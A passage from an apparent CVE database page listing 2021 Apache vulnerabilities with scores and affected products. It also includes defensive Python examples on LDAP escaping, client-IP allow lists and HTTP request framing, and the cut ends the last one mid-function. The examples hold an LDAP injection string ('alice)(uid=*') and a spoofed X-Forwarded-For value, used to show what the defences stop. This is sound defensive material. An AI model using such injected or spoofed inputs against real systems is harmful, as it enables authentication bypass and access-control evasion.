oracle communications_pricing_design_center 12.0.0.5.0
netapp active_iq_unified_manager -
oracle retail_service_backbone 14.1.3.2
oracle communications_pricing_design_center 12.0.0.4.0
oracle enterprise_session_border_controller 8.4
oracle retail_order_broker 18.0
oracle retail_size_profile_optimization 16.0.3
oracle weblogic_server 12.1.3.0.0
CVE-2021-29621 MEDIUM

Flask-AppBuilder is a development framework built on top of Flask. User enumeration in database authentication exists in Flask-AppBuilder <= 3.2.3. It allows a non-authenticated user to enumerate existing accounts by timing the server's response when logging in. Upgrade to version 3.3.0 or higher to resolve.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-203,

Products Affected

Vendor Product Version
flask-appbuilder_project flask-appbuilder *
apache airflow 1.10.0
CVE-2021-29943 MEDIUM

When using ConfigurableInternodeAuthHadoopPlugin for authentication, Apache Solr versions prior to 8.8.2 would forward/proxy distributed requests using server credentials instead of original client credentials. This would result in incorrect authorization resolution on the receiving hosts.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache solr *
CVE-2021-30128 HIGH

Apache OFBiz has unsafe deserialization prior to version 17.12.07.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2021-30129 MEDIUM

A vulnerability in sshd-core of Apache Mina SSHD allows an attacker to overflow the server, causing an OutOfMemory error. This issue affects the SFTP and port forwarding features of Apache Mina SSHD version 2.0.0 and later versions. It was addressed in Apache Mina SSHD 2.7.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-772,

Products Affected

Vendor Product Version
oracle banking_payments 14.5
oracle communications_cloud_native_core_console 1.9.0
oracle flexcube_universal_banking *
oracle middleware_common_libraries_and_tools 12.2.1.4.0
apache sshd *
oracle flexcube_universal_banking 14.5
oracle banking_treasury_management 14.5
oracle retail_customer_management_and_segmentation_foundation 18.0
oracle middleware_common_libraries_and_tools 14.1.1.0.0
oracle banking_trade_finance 14.5
oracle middleware_common_libraries_and_tools 12.2.1.3.0
oracle retail_customer_management_and_segmentation_foundation 19.0
oracle oss_support_tools 2.12.42
CVE-2021-30179 HIGH

Apache Dubbo prior to 2.6.9 and 2.7.9 by default supports generic calls to arbitrary methods exposed by provider interfaces. These invocations are handled by the GenericFilter, which will find the service and method specified in the first arguments of the invocation and use the Java Reflection API to make the final call. The signature for the $invoke or $invokeAsync methods is Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object; where the first argument is the name of the method to invoke, the second one is an array with the parameter types for the method being invoked, and the third one is an array with the actual call arguments. In addition, the caller also needs to set an RPC attachment specifying that the call is a generic call and how to decode the arguments. The possible values are: true, raw.return, nativejava, bean, and protobuf-json. An attacker can control this RPC attachment and set it to nativejava to force the Java deserialization of the byte array located in the third argument.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-30180 MEDIUM

Apache Dubbo prior to 2.7.9 supports Tag routing, which enables a customer to route a request to the right server. These rules are used by customers when making a request in order to find the right endpoint. When parsing these YAML rules, Dubbo customers may enable calling arbitrary constructors.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-30181 HIGH

Apache Dubbo prior to 2.6.9 and 2.7.9 supports Script routing which will enable a customer to route the request to the right server. These rules are used by the customers when making a request in order to find the right endpoint. When parsing these rules, Dubbo customers use ScriptEngine and run the rule provided by the script which by default may enable executing arbitrary code.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-30245 MEDIUM

The project received a report that all versions of Apache OpenOffice through 4.1.8 can open non-http(s) hyperlinks. The problem has existed since about 2006 and the issue is also in 4.1.9. If the link is specifically crafted this could lead to untrusted code execution. It is always best practice to be careful opening documents from unknown and unverified sources. The mitigation in Apache OpenOffice 4.1.10 (unreleased) assures that a security warning is displayed giving the user the option of continuing to open the hyperlink.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-610,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2021-30468 MEDIUM

A vulnerability in the JsonMapObjectReaderWriter of Apache CXF allows an attacker to submit malformed JSON to a web service, which results in the thread getting stuck in an infinite loop, consuming CPU indefinitely. This issue affects Apache CXF versions prior to 3.4.4; Apache CXF versions prior to 3.3.11.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,CWE-835,

Products Affected

Vendor Product Version
oracle business_intelligence 12.2.1.4.0
apache tomee 8.0.6
apache cxf *
oracle communications_messaging_server 8.1
oracle business_intelligence 5.9.0.0.0
oracle business_intelligence 5.5.0.0.0
oracle business_intelligence 12.2.1.3.0
oracle communications_element_manager 8.2.2
CVE-2021-30638 MEDIUM

Information Exposure vulnerability in context asset handling of Apache Tapestry allows an attacker to download files inside WEB-INF if using a specially-constructed URL. This was caused by an incomplete fix for CVE-2020-13953. This issue affects Apache Tapestry 5.4.0 through 5.6.3 and Apache Tapestry 5.7.0 through 5.7.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-863,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2021-30639 MEDIUM

A vulnerability in Apache Tomcat allows an attacker to remotely trigger a denial of service. An error introduced as part of a change to improve error handling during non-blocking I/O meant that the error flag associated with the Request object was not reset between requests. This meant that once a non-blocking I/O error occurred, all future requests handled by that request object would fail. Users were able to trigger non-blocking I/O errors, e.g. by dropping a connection, thereby creating the possibility of triggering a DoS. Applications that do not use non-blocking I/O are not exposed to this vulnerability. This issue affects Apache Tomcat 10.0.3 to 10.0.4; 9.0.44; 8.5.64.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-755,

Products Affected

Vendor Product Version
apache tomcat 8.5.64
apache tomcat 10.0.3
apache tomcat 10.0.4
mcafee epolicy_orchestrator *
mcafee epolicy_orchestrator 5.10.0
apache tomcat 9.0.44
oracle big_data_spatial_and_graph *
CVE-2021-30640 MEDIUM

A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65.
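The advisory above does not say which user-name variations the JNDI Realm accepted, but its CWE-116 classification points at escaping. The following is an added example, not Tomcat's code: it shows a user name being substituted into an LDAP search filter with and without RFC 4515 escaping, plus a shape check a realm can apply to the filter it is about to send. The "{0}" placeholder and the filter strings are constructed for the example.

```python
"""Escape untrusted input before it is spliced into an LDAP search filter.

Added example, not Tomcat's code. It assumes the escaping half of the
CVE-2021-30640 problem (CWE-116): a user name substituted into a search
filter without RFC 4515 escaping. The "{0}" placeholder and the filter
strings are constructed for the example.
"""

# RFC 4515 section 3: these characters must be hex-escaped inside a filter value.
_LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_ldap_filter_value(value: str) -> str:
    """Return `value` with RFC 4515 special characters hex-escaped."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_user_search_unsafe(pattern: str, username: str) -> str:
    """Vulnerable shape: the raw user name is substituted into the filter."""
    return pattern.replace("{0}", username)


def build_user_search_safe(pattern: str, username: str) -> str:
    """Hardened shape: the user name is escaped before substitution."""
    return pattern.replace("{0}", escape_ldap_filter_value(username))


def is_exact_user_filter(filter_str: str, attribute: str = "uid") -> bool:
    """Defence in depth: accept only a single equality assertion on `attribute`.

    Rejects filters that grew extra parentheses (injected assertions) or an
    unescaped '*' (which turns equality into a substring or presence match).
    """
    if not (filter_str.startswith("(") and filter_str.endswith(")")):
        return False
    inner = filter_str[1:-1]
    if "(" in inner or ")" in inner:
        return False
    attr, sep, value = inner.partition("=")
    if sep != "=" or attr != attribute or not value:
        return False
    return "*" not in value


if __name__ == "__main__":
    pattern = "(uid={0})"
    for name in ("alice", "alice*", "alice)(uid=*"):
        unsafe = build_user_search_unsafe(pattern, name)
        safe = build_user_search_safe(pattern, name)
        print(f"{name!r:16} unsafe {unsafe!r:26} exact={is_exact_user_filter(unsafe)}")
        print(f"{'':16} safe   {safe!r:26} exact={is_exact_user_filter(safe)}")
```

The shape check is the part that also helps against a lock-out bypass: a realm that counts failures per submitted string should key its counter on the canonical name that the directory actually matched, and a filter that is no longer a single equality assertion is a sign that the submitted string is not that name.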

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N 2.2 4.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-116,

Products Affected

Vendor Product Version
apache tomcat *
oracle hospitality_cruise_shipboard_property_management_system 20.1.0
debian debian_linux 9.0
oracle communications_pricing_design_center 12.0.0.3.0
debian debian_linux 10.0
oracle tekelec_platform_distribution *
oracle communications_diameter_signaling_router *
oracle communications_cloud_native_core_policy 1.14.0
debian debian_linux 11.0
CVE-2021-30641 MEDIUM

Apache HTTP Server versions 2.4.39 to 2.4.46: unexpected matching behavior with 'MergeSlashes OFF'.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
oracle zfs_storage_appliance_kit 8.8
debian debian_linux 10.0
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle enterprise_manager_ops_center 12.4.0.0
CVE-2021-31164 MEDIUM

Apache Unomi prior to version 1.5.5 allows CRLF log injection because of the lack of escaping in the log statements.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-93,CWE-74,

Products Affected

Vendor Product Version
apache unomi *
CVE-2021-31522 HIGH

Kylin can receive user input and load any class through Class.forName(...). This issue affects Apache Kylin 2 version 2.6.6 and prior versions; Apache Kylin 3 version 3.1.2 and prior versions; Apache Kylin 4 version 4.0.0 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-470,

Products Affected

Vendor Product Version
apache kylin 4.0.0
apache kylin *
CVE-2021-31618 MEDIUM

The Apache HTTP Server protocol handler for the HTTP/2 protocol checks received request headers against the size limitations configured for the server and also used for the HTTP/1 protocol. On violation of these restrictions an HTTP response is sent to the client with a status code indicating why the request was rejected. This rejection response was not fully initialised in the HTTP/2 protocol handler if the offending header was the very first one received or appeared in a footer. This led to a NULL pointer dereference on initialised memory, reliably crashing the child process. Since such a triggering HTTP/2 request is easy to craft and submit, this can be exploited to DoS the server. This issue affected mod_http2 1.15.17 and Apache HTTP Server version 2.4.47 only. Apache HTTP Server 2.4.47 was never released.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
fedoraproject fedora 34
apache http_server 2.4.47
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
oracle zfs_storage_appliance_kit 8.8
debian debian_linux 10.0
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle enterprise_manager_ops_center 12.4.0.0
apache http_server 1.15.17
fedoraproject fedora 33
CVE-2021-31805 HIGH

The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-917,

Products Affected

Vendor Product Version
apache struts *
CVE-2021-31811 MEDIUM

In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-789,CWE-770,

Products Affected

Vendor Product Version
oracle banking_supply_chain_finance 14.2.0
oracle primavera_unifier 20.12
oracle banking_corporate_lending_process_management 14.3.0
oracle banking_supply_chain_finance 14.3.0
oracle retail_customer_management_and_segmentation_foundation 18.1
oracle banking_credit_facilities_process_management 14.3.0
oracle primavera_unifier 18.8
oracle flexcube_universal_banking *
apache pdfbox *
oracle flexcube_universal_banking 14.5
oracle banking_corporate_lending_process_management 14.5.0
oracle banking_treasury_management 14.5
oracle banking_corporate_lending_process_management 14.2.0
oracle banking_supply_chain_finance 14.5.0
oracle primavera_unifier 19.12
fedoraproject fedora 34
oracle outside_in_technology 8.5.5
oracle banking_trade_finance 14.5
oracle banking_credit_facilities_process_management 14.5.0
oracle banking_credit_facilities_process_management 14.2.0
oracle primavera_unifier *
oracle communications_messaging_server 8.1
fedoraproject fedora 33
CVE-2021-31812 MEDIUM

In Apache PDFBox, a carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-834,CWE-835,

Products Affected

Vendor Product Version
oracle banking_supply_chain_finance 14.2.0
oracle banking_corporate_lending_process_management 14.3.0
oracle banking_supply_chain_finance 14.3.0
oracle retail_customer_management_and_segmentation_foundation 18.1
oracle banking_credit_facilities_process_management 14.3.0
apache pdfbox *
oracle banking_corporate_lending_process_management 14.5.0
oracle banking_corporate_lending_process_management 14.2.0
oracle banking_supply_chain_finance 14.5.0
fedoraproject fedora 34
oracle banking_credit_facilities_process_management 14.5.0
oracle banking_credit_facilities_process_management 14.2.0
oracle communications_messaging_server 8.1
fedoraproject fedora 33
CVE-2021-32565 MEDIUM

Invalid values in the Content-Length header sent to Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 7.0.0 to 7.1.12, 8.0.0 to 8.1.1, 9.0.0 to 9.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2021-32566 MEDIUM

Improper Input Validation vulnerability in HTTP/2 of Apache Traffic Server allows an attacker to DOS the server. This issue affects Apache Traffic Server 7.0.0 to 7.1.12, 8.0.0 to 8.1.1, 9.0.0 to 9.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2021-32567 MEDIUM

Improper Input Validation vulnerability in HTTP/2 of Apache Traffic Server allows an attacker to DOS the server. This issue affects Apache Traffic Server 7.0.0 to 7.1.12, 8.0.0 to 8.1.1, 9.0.0 to 9.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2021-32609 LOW

Apache Superset up to and including 1.1 does not sanitize titles correctly on the Explore page. This allows an attacker with Explore access to save a chart with a malicious title, injecting html (including scripts) into the page.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-32824

Apache Dubbo is a java based, open source RPC framework. Versions prior to 2.6.10 and 2.7.10 are vulnerable to pre-auth remote code execution via arbitrary bean manipulation in the Telnet handler. The Dubbo main service port can be used to access a Telnet Handler which offers some basic methods to collect information about the providers and methods exposed by the service and it can even allow to shutdown the service. This endpoint is unprotected. Additionally, a provider method can be invoked using the `invoke` handler. This handler uses a safe version of FastJson to process the call arguments. However, the resulting list is later processed with `PojoUtils.realize` which can be used to instantiate arbitrary classes and invoke its setters. Even though FastJson is properly protected with a default blocklist, `PojoUtils.realize` is not, and an attacker can leverage that to achieve remote code execution. Versions 2.6.10 and 2.7.10 contain fixes for this issue.

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-33035 MEDIUM

Apache OpenOffice opens dBase/DBF documents and shows the contents as spreadsheets. DBF are database files with data organized in fields. When reading DBF data the size of certain fields is not checked: the data is just copied into local variables. A carefully crafted document could overflow the allocated space, leading to the execution of arbitrary code by altering the contents of the program stack. This issue affects Apache OpenOffice up to and including version 4.1.10.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-120,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2021-33036 HIGH

In Apache Hadoop 2.2.0 to 2.10.1, 3.0.0-alpha1 to 3.1.4, 3.2.0 to 3.2.2, and 3.3.0 to 3.3.1, a user who can escalate to yarn user can possibly run arbitrary commands as root user. Users should upgrade to Apache Hadoop 2.10.2, 3.2.3, 3.3.2 or higher.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-24,CWE-264,CWE-22,

Products Affected

Vendor Product Version
apache hadoop *
apache hadoop 3.0.0
CVE-2021-33037 MEDIUM

Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP Transfer-Encoding request header in some circumstances, leading to the possibility of request smuggling when used with a reverse proxy. Specifically: Tomcat incorrectly ignored the Transfer-Encoding header if the client declared it would only accept an HTTP/1.0 response; Tomcat honoured the identity encoding; and Tomcat did not ensure that, if present, the chunked encoding was the final encoding.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle communications_session_route_manager *
oracle instantis_enterprisetrack 17.1
debian debian_linux 10.0
oracle secure_global_desktop 5.6
oracle communications_diameter_signaling_router *
oracle managed_file_transfer 12.2.1.4.0
oracle communications_instant_messaging_server 10.0.1.5.0
oracle communications_session_report_manager *
apache tomcat *
oracle sd-wan_edge 9.1
oracle utilities_testing_accelerator 6.0.0.2.2
oracle agile_plm 9.3.6
oracle communications_pricing_design_center 12.0.0.3.0
apache tomee 8.0.6
oracle mysql_enterprise_monitor *
oracle instantis_enterprisetrack 17.3
oracle communications_cloud_native_core_policy 1.14.0
oracle graph_server_and_client *
mcafee epolicy_orchestrator *
mcafee epolicy_orchestrator 5.10.0
debian debian_linux 9.0
oracle healthcare_translational_research 4.1.0
oracle sd-wan_edge 9.0
oracle communications_cloud_native_core_service_communication_proxy 1.14.0
oracle utilities_testing_accelerator 6.0.0.3.1
oracle hospitality_cruise_shipboard_property_management_system 20.1.0
oracle managed_file_transfer 12.2.1.3.0
oracle instantis_enterprisetrack 17.2
oracle utilities_testing_accelerator 6.0.0.1.1
CVE-2021-33190 MEDIUM

In Apache APISIX Dashboard version 2.6, we changed the default value of the listen host to 0.0.0.0 in order to make it easier for users to configure external network access. In the IP allowed-list restriction, a risky function was used to obtain the client IP, which made it possible to bypass the network limit. At the same time, the default account and password are fixed. Together these factors create a security risk. This issue is fixed in APISIX Dashboard 2.6.1.
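The advisory does not name the "risky function" used for IP acquisition. The following is an added example, not APISIX Dashboard code: it assumes the usual form of that mistake, reading X-Forwarded-For or X-Real-IP unconditionally, and contrasts it with a resolver that honours those headers only when the TCP peer is a configured trusted proxy. The addresses, allow list and proxy ranges are constructed for the example.

```python
"""Resolve the client address for an IP allow list without trusting headers
the client itself can set.

Added example, not APISIX Dashboard code. It assumes the common form of the
CVE-2021-33190 "risky function": reading X-Forwarded-For / X-Real-IP without
checking who sent them. All addresses below are constructed.
"""
import ipaddress
from typing import Iterable, Mapping, Optional, Union

IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


def _parse_ip(text: str) -> Optional[IPAddress]:
    try:
        return ipaddress.ip_address(text.strip())
    except ValueError:
        return None


def _in_any(ip: IPAddress, networks: Iterable[str]) -> bool:
    # strict=False lets a bare host such as "10.0.1.2" be listed as well.
    return any(ip in ipaddress.ip_network(n, strict=False) for n in networks)


def client_ip_unsafe(peer: str, headers: Mapping[str, str]) -> Optional[IPAddress]:
    """Vulnerable shape: believe whatever the request says about its origin."""
    forwarded = headers.get("x-forwarded-for") or headers.get("x-real-ip")
    if forwarded:
        return _parse_ip(forwarded.split(",")[0])
    return _parse_ip(peer)


def client_ip_safe(peer: str, headers: Mapping[str, str],
                   trusted_proxies: Iterable[str]) -> Optional[IPAddress]:
    """Hardened: use the TCP peer unless it is a trusted proxy; if it is, walk
    X-Forwarded-For from the right, skipping hops that are themselves trusted
    proxies, so only an address appended by a proxy is believed."""
    peer_ip = _parse_ip(peer)
    if peer_ip is None:
        return None
    trusted = list(trusted_proxies)
    if not _in_any(peer_ip, trusted):
        return peer_ip
    raw_hops = headers.get("x-forwarded-for", "").split(",")
    hops = [h for h in (_parse_ip(p) for p in raw_hops) if h is not None]
    for hop in reversed(hops):
        if not _in_any(hop, trusted):
            return hop
    return peer_ip  # header absent, or every hop was a trusted proxy


def is_allowed(ip: Optional[IPAddress], allow_list: Iterable[str]) -> bool:
    return ip is not None and _in_any(ip, allow_list)


if __name__ == "__main__":
    allow_list = ["10.0.0.0/8"]        # "only the internal network may log in"
    trusted_proxies = ["10.0.1.0/24"]  # reverse proxies in front of the dashboard
    # Constructed: an external client claims an internal address in the header.
    spoofed = {"x-forwarded-for": "10.0.0.7"}
    print("unsafe:", is_allowed(client_ip_unsafe("203.0.113.9", spoofed), allow_list))
    print("safe:  ", is_allowed(client_ip_safe("203.0.113.9", spoofed, trusted_proxies), allow_list))
```

Two operational notes follow from the example: binding to 0.0.0.0 only matters once the allow list can be fooled, and an allow list never substitutes for changing a fixed default credential, which the advisory lists as a separate factor.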

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-307,

Products Affected

Vendor Product Version
apache apisix_dashboard 2.6
CVE-2021-33191 HIGH

From Apache NiFi MiNiFi C++ version 0.5.0 the c2 protocol implements an "agent-update" command which was designed to patch the application binary. This "patching" command defaults to calling a trusted binary, but might be modified to an arbitrary value through a "c2-update" command. Said command is then executed using the same privileges as the application binary. This was addressed in version 0.10.0

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache nifi_minifi_c++ *
CVE-2021-33192 MEDIUM

A vulnerability in the HTML pages of Apache Jena Fuseki allows an attacker to execute arbitrary javascript on certain page views. This issue affects Apache Jena Fuseki from version 2.0.0 to version 4.0.0 (inclusive).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jena_fuseki *
CVE-2021-33193 MEDIUM

A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.
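Three advisories on this page (CVE-2021-32565 on invalid Content-Length values in Traffic Server, CVE-2021-33037 on Tomcat's lenient Transfer-Encoding parsing, and CVE-2021-33193 on a non-token method forwarded by mod_proxy) are all failures to enforce RFC 7230 framing rules at a hop that other hops rely on. The following is an added example, not code from Traffic Server, Tomcat or httpd: a proxy-side validator that rejects any request two parsers could frame differently. Tomcat's HTTP/1.0-response special case is not modelled; the sample requests are constructed.

```python
"""Reject ambiguously framed HTTP/1.1 requests before a backend can
interpret them differently. Added example, not code from Apache Traffic
Server, Tomcat or httpd. Sample requests are constructed.
"""
import re
from typing import Dict, List, Tuple

# RFC 7230 3.2.6: token = 1*tchar. Methods and header names must be tokens.
_TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
# RFC 7230 3.3.2: Content-Length = 1*DIGIT (no sign, no whitespace, no '+').
_CONTENT_LENGTH = re.compile(r"[0-9]+")


class FramingError(ValueError):
    """Raised for any request two HTTP parsers could frame differently."""


def is_valid_method(method: str) -> bool:
    # fullmatch, not match + '$': '$' would accept a trailing newline.
    return _TOKEN.fullmatch(method) is not None


def parse_request_head(raw: bytes) -> Tuple[str, str, str, List[Tuple[str, str]]]:
    """Split a request head into (method, target, version, [(name, value)]).
    Deliberately minimal: no obs-fold, no HTTP/0.9."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        raise FramingError(f"malformed request line: {lines[0]!r}")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep or _TOKEN.fullmatch(name) is None:  # also rejects "Name :"
            raise FramingError(f"malformed header line: {line!r}")
        headers.append((name.lower(), value.strip()))
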